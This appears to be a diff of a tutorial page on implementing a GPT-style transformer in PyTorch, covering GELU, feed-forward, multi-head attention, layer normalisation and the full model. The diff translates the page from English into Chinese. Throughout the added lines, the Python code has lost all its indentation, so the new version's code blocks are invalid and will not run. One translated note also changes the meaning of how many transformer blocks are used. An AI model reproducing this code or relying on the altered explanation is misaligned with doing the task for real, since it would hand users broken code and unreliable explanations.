+self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
+self.dropout = nn.Dropout(dropout)
+self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
 
-    def forward(self, x):
-        b, num_tokens, d_in = x.shape
+def forward(self, x):
+b, num_tokens, d_in = x.shape
 
-        keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
-        queries = self.W_query(x)
-        values = self.W_value(x)
+keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
+queries = self.W_query(x)
+values = self.W_value(x)
 
-        # We implicitly split the matrix by adding a `num_heads` dimension
-        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
-        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
-        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
-        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
+# We implicitly split the matrix by adding a `num_heads` dimension
+# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
+keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
+values = values.view(b, num_tokens, self.num_heads, self.head_dim)
+queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 
-        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
-        keys = keys.transpose(1, 2)
-        queries = queries.transpose(1, 2)
-        values = values.transpose(1, 2)
+# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
+keys = keys.transpose(1, 2)
+queries = queries.transpose(1, 2)
+values = values.transpose(1, 2)
 
-        # Compute scaled dot-product attention (aka self-attention) with a causal mask
-        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
+# Compute scaled dot-product attention (aka self-attention) with a causal mask
+attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 
-        # Original mask truncated to the number of tokens and converted to boolean
-        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
+# Original mask truncated to the number of tokens and converted to boolean
+mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 
-        # Use the mask to fill attention scores
-        attn_scores.masked_fill_(mask_bool, -torch.inf)
+# Use the mask to fill attention scores
+attn_scores.masked_fill_(mask_bool, -torch.inf)
 
-        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
-        attn_weights = self.dropout(attn_weights)
+attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
+attn_weights = self.dropout(attn_weights)
 
-        # Shape: (b, num_tokens, num_heads, head_dim)
-        context_vec = (attn_weights @ values).transpose(1, 2)
+# Shape: (b, num_tokens, num_heads, head_dim)
+context_vec = (attn_weights @ values).transpose(1, 2)
 
-        # Combine heads, where self.d_out = self.num_heads * self.head_dim
-        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
-        context_vec = self.out_proj(context_vec) # optional projection
+# Combine heads, where self.d_out = self.num_heads * self.head_dim
+context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
+context_vec = self.out_proj(context_vec) # optional projection
 
-        return context_vec
+return context_vec
 
 class LayerNorm(nn.Module):
-    def __init__(self, emb_dim):
-        super().__init__()
-        self.eps = 1e-5
-        self.scale = nn.Parameter(torch.ones(emb_dim))
-        self.shift = nn.Parameter(torch.zeros(emb_dim))
+def __init__(self, emb_dim):
+super().__init__()
+self.eps = 1e-5
+self.scale = nn.Parameter(torch.ones(emb_dim))
+self.shift = nn.Parameter(torch.zeros(emb_dim))
 
-    def forward(self, x):
-        mean = x.mean(dim=-1, keepdim=True)
-        var = x.var(dim=-1, keepdim=True, unbiased=False)
-        norm_x = (x - mean) / torch.sqrt(var + self.eps)
-        return self.scale * norm_x + self.shift
+def forward(self, x):
+mean = x.mean(dim=-1, keepdim=True)
+var = x.var(dim=-1, keepdim=True, unbiased=False)
+norm_x = (x - mean) / torch.sqrt(var + self.eps)
+return self.scale * norm_x + self.shift
 
 class TransformerBlock(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.att = MultiHeadAttention(
-            d_in=cfg["emb_dim"],
-            d_out=cfg["emb_dim"],
-            context_length=cfg["context_length"],
-            num_heads=cfg["n_heads"],
-            dropout=cfg["drop_rate"],
-            qkv_bias=cfg["qkv_bias"])
-        self.ff = FeedForward(cfg)
-        self.norm1 = LayerNorm(cfg["emb_dim"])
-        self.norm2 = LayerNorm(cfg["emb_dim"])
-        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
+def __init__(self, cfg):
+super().__init__()
+self.att = MultiHeadAttention(
+d_in=cfg["emb_dim"],
+d_out=cfg["emb_dim"],
+context_length=cfg["context_length"],
+num_heads=cfg["n_heads"],
+dropout=cfg["drop_rate"],
+qkv_bias=cfg["qkv_bias"])
+self.ff = FeedForward(cfg)
+self.norm1 = LayerNorm(cfg["emb_dim"])
+self.norm2 = LayerNorm(cfg["emb_dim"])
+self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 
-    def forward(self, x):
-        # Shortcut connection for attention block
-        shortcut = x
-        x = self.norm1(x)
-        x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
-        x = self.drop_shortcut(x)
-        x = x + shortcut  # Add the original input back
+def forward(self, x):
+# Shortcut connection for attention block
+shortcut = x
+x = self.norm1(x)
+x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
+x = self.drop_shortcut(x)
+x = x + shortcut  # Add the original input back
 
-        # Shortcut connection for feed forward block
-        shortcut = x
-        x = self.norm2(x)
-        x = self.ff(x)
-        x = self.drop_shortcut(x)
-        x = x + shortcut  # Add the original input back
+# Shortcut connection for feed forward block
+shortcut = x
+x = self.norm2(x)
+x = self.ff(x)
+x = self.drop_shortcut(x)
+x = x + shortcut  # Add the original input back
 
-        return x
+return x
 
 
 class GPTModel(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
-        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
-        self.drop_emb = nn.Dropout(cfg["drop_rate"])
+def __init__(self, cfg):
+super().__init__()
+self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
+self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
+self.drop_emb = nn.Dropout(cfg["drop_rate"])
 
-        self.trf_blocks = nn.Sequential(
-            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
+self.trf_blocks = nn.Sequential(
+*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
 
-        self.final_norm = LayerNorm(cfg["emb_dim"])
-        self.out_head = nn.Linear(
-            cfg["emb_dim"], cfg["vocab_size"], bias=False
-        )
+self.final_norm = LayerNorm(cfg["emb_dim"])
+self.out_head = nn.Linear(
+cfg["emb_dim"], cfg["vocab_size"], bias=False
+)
 
-    def forward(self, in_idx):
-        batch_size, seq_len = in_idx.shape
-        tok_embeds = self.tok_emb(in_idx)
-        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
-        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
-        x = self.drop_emb(x)
-        x = self.trf_blocks(x)
-        x = self.final_norm(x)
-        logits = self.out_head(x)
-        return logits
+def forward(self, in_idx):
+batch_size, seq_len = in_idx.shape
+tok_embeds = self.tok_emb(in_idx)
+pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
+x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
+x = self.drop_emb(x)
+x = self.trf_blocks(x)
+x = self.final_norm(x)
+logits = self.out_head(x)
+return logits
 
 GPT_CONFIG_124M = {
-    "vocab_size": 50257,    # Vocabulary size
-    "context_length": 1024, # Context length
-    "emb_dim": 768,         # Embedding dimension
-    "n_heads": 12,          # Number of attention heads
-    "n_layers": 12,         # Number of layers
-    "drop_rate": 0.1,       # Dropout rate
-    "qkv_bias": False       # Query-Key-Value bias
+"vocab_size": 50257,    # Vocabulary size
+"context_length": 1024, # Context length
+"emb_dim": 768,         # Embedding dimension
+"n_heads": 12,          # Number of attention heads
+"n_layers": 12,         # Number of layers
+"drop_rate": 0.1,       # Dropout rate
+"qkv_bias": False       # Query-Key-Value bias
 }
 
 torch.manual_seed(123)
@@ -196,285 +195,271 @@ print("Input batch:\n", batch)
 print("\nOutput shape:", out.shape)
 print(out)
 ```
-
-Let's explain it step by step:
-
-### **GELU Activation Function**
-
+### **GELU 激活函数**
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class GELU(nn.Module):
-    def __init__(self):
-        super().__init__()
+def __init__(self):
+super().__init__()
 
-    def forward(self, x):
-        return 0.5 * x * (1 + torch.tanh(
-            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
-            (x + 0.044715 * torch.pow(x, 3))
-        ))
+def forward(self, x):
+return 0.5 * x * (1 + torch.tanh(
+torch.sqrt(torch.tensor(2.0 / torch.pi)) *
+(x + 0.044715 * torch.pow(x, 3))
+))
 ```
+#### **目的和功能**
 
-#### **Purpose and Functionality**
-
-- **GELU (Gaussian Error Linear Unit):** An activation function that introduces non-linearity into the model.
-- **Smooth Activation:** Unlike ReLU, which zeroes out negative inputs, GELU smoothly maps inputs to outputs, allowing for small, non-zero values for negative inputs.
-- **Mathematical Definition:**
+- **GELU (高斯误差线性单元):** 一种激活函数，为模型引入非线性。
+- **平滑激活:** 与ReLU不同，ReLU将负输入归零，而GELU平滑地将输入映射到输出，允许负输入有小的非零值。
+- **数学定义:**
 
 <figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> The goal of the use of this function after linear layers inside the FeedForward layer is to change the linear data to be none linear to allow the model to learn complex, non-linear relationships.
+> 在FeedForward层内部的线性层之后使用此函数的目的是将线性数据转换为非线性，以便模型能够学习复杂的非线性关系。
 
-### **FeedForward Neural Network**
-
-_Shapes have been added as comments to understand better the shapes of matrices:_
+### **前馈神经网络**
 
+_已添加形状作为注释，以更好地理解矩阵的形状:_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class FeedForward(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.layers = nn.Sequential(
-            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
-            GELU(),
-            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
-        )
+def __init__(self, cfg):
+super().__init__()
+self.layers = nn.Sequential(
+nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
+GELU(),
+nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
+)
 
-    def forward(self, x):
-        # x shape: (batch_size, seq_len, emb_dim)
+def forward(self, x):
+# x shape: (batch_size, seq_len, emb_dim)
 
-        x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
-        x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
-        x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
-        return x  # Output shape: (batch_size, seq_len, emb_dim)
+x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
+x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
+x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
+return x  # Output shape: (batch_size, seq_len, emb_dim)
 ```
+#### **目的和功能**
 
-#### **Purpose and Functionality**
-
-- **Position-wise FeedForward Network:** Applies a two-layer fully connected network to each position separately and identically.
-- **Layer Details:**
-  - **First Linear Layer:** Expands the dimensionality from `emb_dim` to `4 * emb_dim`.
-  - **GELU Activation:** Applies non-linearity.
-  - **Second Linear Layer:** Reduces the dimensionality back to `emb_dim`.
+- **位置-wise 前馈网络：** 对每个位置分别且相同地应用一个两层全连接网络。
+- **层详细信息：**
+- **第一线性层：** 将维度从 `emb_dim` 扩展到 `4 * emb_dim`。
+- **GELU 激活：** 应用非线性。
+- **第二线性层：** 将维度减少回 `emb_dim`。
 
 > [!NOTE]
-> As you can see, the Feed Forward network uses 3 layers. The first one is a linear layer that will multiply the dimensions by 4 using linear weights (parameters to train inside the model). Then, the GELU function is used in all those dimensions to apply none-linear variations to capture richer representations and finally another linear layer is used to get back to the original size of dimensions.
+> 如您所见，前馈网络使用了 3 层。第一层是一个线性层，它将维度乘以 4，使用线性权重（模型内部训练的参数）。然后，在所有这些维度中使用 GELU 函数应用非线性变化，以捕捉更丰富的表示，最后再使用另一个线性层返回到原始维度大小。
 
-### **Multi-Head Attention Mechanism**
+### **多头注意力机制**
 
-This was already explained in an earlier section.
+这在前面的部分已经解释过。
 
-#### **Purpose and Functionality**
+#### **目的和功能**
 
-- **Multi-Head Self-Attention:** Allows the model to focus on different positions within the input sequence when encoding a token.
-- **Key Components:**
-  - **Queries, Keys, Values:** Linear projections of the input, used to compute attention scores.
-  - **Heads:** Multiple attention mechanisms running in parallel (`num_heads`), each with a reduced dimension (`head_dim`).
-  - **Attention Scores:** Computed as the dot product of queries and keys, scaled and masked.
-  - **Masking:** A causal mask is applied to prevent the model from attending to future tokens (important for autoregressive models like GPT).
-  - **Attention Weights:** Softmax of the masked and scaled attention scores.
-  - **Context Vector:** Weighted sum of the values, according to attention weights.
-  - **Output Projection:** Linear layer to combine the outputs of all heads.
+- **多头自注意力：** 允许模型在编码一个标记时关注输入序列中的不同位置。
+- **关键组件：**
+- **查询、键、值：** 输入的线性投影，用于计算注意力分数。
+- **头：** 多个并行运行的注意力机制（`num_heads`），每个具有减少的维度（`head_dim`）。
+- **注意力分数：** 作为查询和键的点积计算，经过缩放和掩蔽。
+- **掩蔽：** 应用因果掩蔽，以防止模型关注未来的标记（对于像 GPT 这样的自回归模型很重要）。
+- **注意力权重：** 掩蔽和缩放后的注意力分数的 Softmax。
+- **上下文向量：** 根据注意力权重的值的加权和。
+- **输出投影：** 线性层以组合所有头的输出。
 
 > [!NOTE]
-> The goal of this network is to find the relations between tokens in the same context. Moreover, the tokens are divided in different heads in order to prevent overfitting although the final relations found per head are combined at the end of this network.
+> 该网络的目标是找到同一上下文中标记之间的关系。此外，标记被分配到不同的头中，以防止过拟合，尽管每个头找到的最终关系在该网络的末尾被组合在一起。
 >
-> Moreover, during training a **causal mask** is applied so later tokens are not taken into account when looking the specific relations to a token and some **dropout** is also applied to **prevent overfitting**.
-
-### **Layer** Normalization
+> 此外，在训练期间应用了 **因果掩蔽**，以便在查看特定标记的关系时不考虑后续标记，并且还应用了一些 **dropout** 以 **防止过拟合**。
 
+### **层** 归一化
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class LayerNorm(nn.Module):
-    def __init__(self, emb_dim):
-        super().__init__()
-        self.eps = 1e-5 # Prevent division by zero during normalization.
-        self.scale = nn.Parameter(torch.ones(emb_dim))
-        self.shift = nn.Parameter(torch.zeros(emb_dim))
+def __init__(self, emb_dim):
+super().__init__()
+self.eps = 1e-5 # Prevent division by zero during normalization.
+self.scale = nn.Parameter(torch.ones(emb_dim))
+self.shift = nn.Parameter(torch.zeros(emb_dim))
 
-    def forward(self, x):
-        mean = x.mean(dim=-1, keepdim=True)
-        var = x.var(dim=-1, keepdim=True, unbiased=False)
-        norm_x = (x - mean) / torch.sqrt(var + self.eps)
-        return self.scale * norm_x + self.shift
+def forward(self, x):
+mean = x.mean(dim=-1, keepdim=True)
+var = x.var(dim=-1, keepdim=True, unbiased=False)
+norm_x = (x - mean) / torch.sqrt(var + self.eps)
+return self.scale * norm_x + self.shift
 ```
+#### **目的和功能**
 
-#### **Purpose and Functionality**
-
-- **Layer Normalization:** A technique used to normalize the inputs across the features (embedding dimensions) for each individual example in a batch.
-- **Components:**
-  - **`eps`:** A small constant (`1e-5`) added to the variance to prevent division by zero during normalization.
-  - **`scale` and `shift`:** Learnable parameters (`nn.Parameter`) that allow the model to scale and shift the normalized output. They are initialized to ones and zeros, respectively.
-- **Normalization Process:**
-  - **Compute Mean (`mean`):** Calculates the mean of the input `x` across the embedding dimension (`dim=-1`), keeping the dimension for broadcasting (`keepdim=True`).
-  - **Compute Variance (`var`):** Calculates the variance of `x` across the embedding dimension, also keeping the dimension. The `unbiased=False` parameter ensures that the variance is calculated using the biased estimator (dividing by `N` instead of `N-1`), which is appropriate when normalizing over features rather than samples.
-  - **Normalize (`norm_x`):** Subtracts the mean from `x` and divides by the square root of the variance plus `eps`.
-  - **Scale and Shift:** Applies the learnable `scale` and `shift` parameters to the normalized output.
+- **层归一化：** 一种用于对每个批次中单个示例的特征（嵌入维度）进行归一化的技术。
+- **组件：**
+- **`eps`：** 一个小常数（`1e-5`），在归一化过程中添加到方差中以防止除以零。
+- **`scale` 和 `shift`：** 可学习的参数（`nn.Parameter`），允许模型对归一化输出进行缩放和偏移。它们分别初始化为1和0。
+- **归一化过程：**
+- **计算均值（`mean`）：** 计算输入 `x` 在嵌入维度（`dim=-1`）上的均值，同时保持维度以便广播（`keepdim=True`）。
+- **计算方差（`var`）：** 计算 `x` 在嵌入维度上的方差，同样保持维度。`unbiased=False` 参数确保方差使用有偏估计量计算（除以 `N` 而不是 `N-1`），这在对特征而非样本进行归一化时是合适的。
+- **归一化（`norm_x`）：** 从 `x` 中减去均值，并除以方差加 `eps` 的平方根。
+- **缩放和偏移：** 将可学习的 `scale` 和 `shift` 参数应用于归一化输出。
 
 > [!NOTE]
-> The goal is to ensure a mean of 0 with a variance of 1 across all dimensions of the same token . The goal of this is to **stabilize the training of deep neural networks** by reducing the internal covariate shift, which refers to the change in the distribution of network activations due to the updating of parameters during training.
+> 目标是确保同一标记的所有维度的均值为0，方差为1。这样做的目的是**通过减少内部协变量偏移来稳定深度神经网络的训练**，内部协变量偏移是指由于训练过程中参数更新而导致的网络激活分布的变化。
 
-### **Transformer Block**
-
-_Shapes have been added as comments to understand better the shapes of matrices:_
+### **Transformer 块**
 
+_已添加形状作为注释，以更好地理解矩阵的形状：_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 
 class TransformerBlock(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.att = MultiHeadAttention(
-            d_in=cfg["emb_dim"],
-            d_out=cfg["emb_dim"],
-            context_length=cfg["context_length"],
-            num_heads=cfg["n_heads"],
-            dropout=cfg["drop_rate"],
-            qkv_bias=cfg["qkv_bias"]
-        )
-        self.ff = FeedForward(cfg)
-        self.norm1 = LayerNorm(cfg["emb_dim"])
-        self.norm2 = LayerNorm(cfg["emb_dim"])
-        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
+def __init__(self, cfg):
+super().__init__()
+self.att = MultiHeadAttention(
+d_in=cfg["emb_dim"],
+d_out=cfg["emb_dim"],
+context_length=cfg["context_length"],
+num_heads=cfg["n_heads"],
+dropout=cfg["drop_rate"],
+qkv_bias=cfg["qkv_bias"]
+)
+self.ff = FeedForward(cfg)
+self.norm1 = LayerNorm(cfg["emb_dim"])
+self.norm2 = LayerNorm(cfg["emb_dim"])
+self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 
-    def forward(self, x):
-        # x shape: (batch_size, seq_len, emb_dim)
+def forward(self, x):
+# x shape: (batch_size, seq_len, emb_dim)
 
-        # Shortcut connection for attention block
-        shortcut = x  # shape: (batch_size, seq_len, emb_dim)
-        x = self.norm1(x)  # shape remains (batch_size, seq_len, emb_dim)
-        x = self.att(x)    # shape: (batch_size, seq_len, emb_dim)
-        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
-        x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
+# Shortcut connection for attention block
+shortcut = x  # shape: (batch_size, seq_len, emb_dim)
+x = self.norm1(x)  # shape remains (batch_size, seq_len, emb_dim)
+x = self.att(x)    # shape: (batch_size, seq_len, emb_dim)
+x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
+x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 
-        # Shortcut connection for feedforward block
-        shortcut = x       # shape: (batch_size, seq_len, emb_dim)
-        x = self.norm2(x)  # shape remains (batch_size, seq_len, emb_dim)
-        x = self.ff(x)     # shape: (batch_size, seq_len, emb_dim)
-        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
-        x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
+# Shortcut connection for feedforward block
+shortcut = x       # shape: (batch_size, seq_len, emb_dim)
+x = self.norm2(x)  # shape remains (batch_size, seq_len, emb_dim)
+x = self.ff(x)     # shape: (batch_size, seq_len, emb_dim)
+x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
+x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 
-        return x  # Output shape: (batch_size, seq_len, emb_dim)
+return x  # Output shape: (batch_size, seq_len, emb_dim)
 
 ```
+#### **目的和功能**
 
-#### **Purpose and Functionality**
+- **层的组成：** 结合多头注意力、前馈网络、层归一化和残差连接。
+- **层归一化：** 在注意力和前馈层之前应用，以确保稳定的训练。
+- **残差连接（快捷方式）：** 将层的输入添加到其输出，以改善梯度流并使深层网络的训练成为可能。
+- **丢弃法：** 在注意力和前馈层之后应用，以进行正则化。
 
-- **Composition of Layers:** Combines multi-head attention, feedforward network, layer normalization, and residual connections.
-- **Layer Normalization:** Applied before the attention and feedforward layers for stable training.
-- **Residual Connections (Shortcuts):** Add the input of a layer to its output to improve gradient flow and enable training of deep networks.
-- **Dropout:** Applied after attention and feedforward layers for regularization.
+#### **逐步功能**
 
-#### **Step-by-Step Functionality**
-
-1. **First Residual Path (Self-Attention):**
-   - **Input (`shortcut`):** Save the original input for the residual connection.
-   - **Layer Norm (`norm1`):** Normalize the input.
-   - **Multi-Head Attention (`att`):** Apply self-attention.
-   - **Dropout (`drop_shortcut`):** Apply dropout for regularization.
-   - **Add Residual (`x + shortcut`):** Combine with the original input.
-2. **Second Residual Path (FeedForward):**
-   - **Input (`shortcut`):** Save the updated input for the next residual connection.
-   - **Layer Norm (`norm2`):** Normalize the input.
-   - **FeedForward Network (`ff`):** Apply the feedforward transformation.
-   - **Dropout (`drop_shortcut`):** Apply dropout.
-   - **Add Residual (`x + shortcut`):** Combine with the input from the first residual path.
+1. **第一个残差路径（自注意力）：**
+- **输入（`shortcut`）：** 保存原始输入以进行残差连接。
+- **层归一化（`norm1`）：** 归一化输入。
+- **多头注意力（`att`）：** 应用自注意力。
+- **丢弃法（`drop_shortcut`）：** 应用丢弃法以进行正则化。
+- **添加残差（`x + shortcut`）：** 与原始输入结合。
+2. **第二个残差路径（前馈）：**
+- **输入（`shortcut`）：** 保存更新后的输入以进行下一个残差连接。
+- **层归一化（`norm2`）：** 归一化输入。
+- **前馈网络（`ff`）：** 应用前馈变换。
+- **丢弃法（`drop_shortcut`）：** 应用丢弃法。
+- **添加残差（`x + shortcut`）：** 与第一个残差路径的输入结合。
 
 > [!NOTE]
-> The transformer block groups all the networks together and applies some **normalization** and **dropouts** to improve the training stability and results.\
-> Note how dropouts are done after the use of each network while normalization is applied before.
+> transformer块将所有网络组合在一起，并应用一些**归一化**和**丢弃法**以改善训练的稳定性和结果。\
+> 注意丢弃法是在每个网络使用后进行的，而归一化是在之前应用的。
 >
-> Moreover, it also uses shortcuts which consists on **adding the output of a network with its input**. This helps to prevent the vanishing gradient problem by making sure that initial layers contribute "as much" as the last ones.
+> 此外，它还使用快捷方式，即**将网络的输出与其输入相加**。这有助于防止梯度消失问题，确保初始层的贡献与最后一层“相当”。
 
 ### **GPTModel**
 
-_Shapes have been added as comments to understand better the shapes of matrices:_
-
+_已添加形状作为注释，以更好地理解矩阵的形状：_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class GPTModel(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
-        # shape: (vocab_size, emb_dim)
+def __init__(self, cfg):
+super().__init__()
+self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
+# shape: (vocab_size, emb_dim)
 
-        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
-        # shape: (context_length, emb_dim)
+self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
+# shape: (context_length, emb_dim)
 
-        self.drop_emb = nn.Dropout(cfg["drop_rate"])
+self.drop_emb = nn.Dropout(cfg["drop_rate"])
 
-        self.trf_blocks = nn.Sequential(
-            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
-        )
-        # Stack of TransformerBlocks
+self.trf_blocks = nn.Sequential(
+*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
+)
+# Stack of TransformerBlocks
 
-        self.final_norm = LayerNorm(cfg["emb_dim"])
-        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
-        # shape: (emb_dim, vocab_size)
+self.final_norm = LayerNorm(cfg["emb_dim"])
+self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
+# shape: (emb_dim, vocab_size)
 
-    def forward(self, in_idx):
-        # in_idx shape: (batch_size, seq_len)
-        batch_size, seq_len = in_idx.shape
+def forward(self, in_idx):
+# in_idx shape: (batch_size, seq_len)
+batch_size, seq_len = in_idx.shape
 
-        # Token embeddings
-        tok_embeds = self.tok_emb(in_idx)
-        # shape: (batch_size, seq_len, emb_dim)
+# Token embeddings
+tok_embeds = self.tok_emb(in_idx)
+# shape: (batch_size, seq_len, emb_dim)
 
-        # Positional embeddings
-        pos_indices = torch.arange(seq_len, device=in_idx.device)
-        # shape: (seq_len,)
-        pos_embeds = self.pos_emb(pos_indices)
-        # shape: (seq_len, emb_dim)
+# Positional embeddings
+pos_indices = torch.arange(seq_len, device=in_idx.device)
+# shape: (seq_len,)
+pos_embeds = self.pos_emb(pos_indices)
+# shape: (seq_len, emb_dim)
 
-        # Add token and positional embeddings
-        x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
-        # x shape: (batch_size, seq_len, emb_dim)
+# Add token and positional embeddings
+x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
+# x shape: (batch_size, seq_len, emb_dim)
 
-        x = self.drop_emb(x)  # Dropout applied
-        # x shape remains: (batch_size, seq_len, emb_dim)
+x = self.drop_emb(x)  # Dropout applied
+# x shape remains: (batch_size, seq_len, emb_dim)
 
-        x = self.trf_blocks(x)  # Pass through Transformer blocks
-        # x shape remains: (batch_size, seq_len, emb_dim)
+x = self.trf_blocks(x)  # Pass through Transformer blocks
+# x shape remains: (batch_size, seq_len, emb_dim)
 
-        x = self.final_norm(x)  # Final LayerNorm
-        # x shape remains: (batch_size, seq_len, emb_dim)
+x = self.final_norm(x)  # Final LayerNorm
+# x shape remains: (batch_size, seq_len, emb_dim)
 
-        logits = self.out_head(x)  # Project to vocabulary size
-        # logits shape: (batch_size, seq_len, vocab_size)
+logits = self.out_head(x)  # Project to vocabulary size
+# logits shape: (batch_size, seq_len, vocab_size)
 
-        return logits  # Output shape: (batch_size, seq_len, vocab_size)
+return logits  # Output shape: (batch_size, seq_len, vocab_size)
 ```
+#### **目的和功能**
 
-#### **Purpose and Functionality**
-
-- **Embedding Layers:**
-  - **Token Embeddings (`tok_emb`):** Converts token indices into embeddings. As reminder, these are the weights given to each dimension of each token in the vocabulary.
-  - **Positional Embeddings (`pos_emb`):** Adds positional information to the embeddings to capture the order of tokens. As reminder, these are the weights given to token according to it's position in the text.
-- **Dropout (`drop_emb`):** Applied to embeddings for regularisation.
-- **Transformer Blocks (`trf_blocks`):** Stack of `n_layers` transformer blocks to process embeddings.
-- **Final Normalization (`final_norm`):** Layer normalization before the output layer.
-- **Output Layer (`out_head`):** Projects the final hidden states to the vocabulary size to produce logits for prediction.
+- **嵌入层:**
+- **令牌嵌入 (`tok_emb`):** 将令牌索引转换为嵌入。作为提醒，这些是赋予词汇中每个令牌每个维度的权重。
+- **位置嵌入 (`pos_emb`):** 向嵌入添加位置信息，以捕捉令牌的顺序。作为提醒，这些是根据令牌在文本中的位置赋予的权重。
+- **丢弃 (`drop_emb`):** 应用于嵌入以进行正则化。
+- **变换器块 (`trf_blocks`):** 堆叠 `n_layers` 个变换器块以处理嵌入。
+- **最终归一化 (`final_norm`):** 在输出层之前进行层归一化。
+- **输出层 (`out_head`):** 将最终隐藏状态投影到词汇大小，以生成预测的 logits。
 
 > [!NOTE]
-> The goal of this class is to use all the other mentioned networks to **predict the next token in a sequence**, which is fundamental for tasks like text generation.
+> 该类的目标是使用所有其他提到的网络来**预测序列中的下一个令牌**，这对于文本生成等任务至关重要。
 >
-> Note how it will **use as many transformer blocks as indicated** and that each transformer block is using one multi-head attestation net, one feed forward net and several normalizations. So if 12 transformer blocks are used, multiply this by 12.
+> 注意它将**使用尽可能多的变换器块**，并且每个变换器块使用一个多头注意力网络、一个前馈网络和几个归一化。因此，如果使用12个变换器块，则将其乘以12。
 >
-> Moreover, a **normalization** layer is added **before** the **output** and a final linear layer is applied a the end to get the results with the proper dimensions. Note how each final vector has the size of the used vocabulary. This is because it's trying to get a probability per possible token inside the vocabulary.
+> 此外，在**输出**之前添加了一个**归一化**层，并在最后应用一个最终线性层以获得具有适当维度的结果。注意每个最终向量的大小与使用的词汇相同。这是因为它试图为词汇中的每个可能令牌获取一个概率。
 
-## Number of Parameters to train
-
-Having the GPT structure defined it's possible to find out the number of parameters to train:
+## 训练的参数数量
 
+定义了GPT结构后，可以找出要训练的参数数量：
 ```python
 GPT_CONFIG_124M = {
-    "vocab_size": 50257,    # Vocabulary size
-    "context_length": 1024, # Context length
-    "emb_dim": 768,         # Embedding dimension
-    "n_heads": 12,          # Number of attention heads
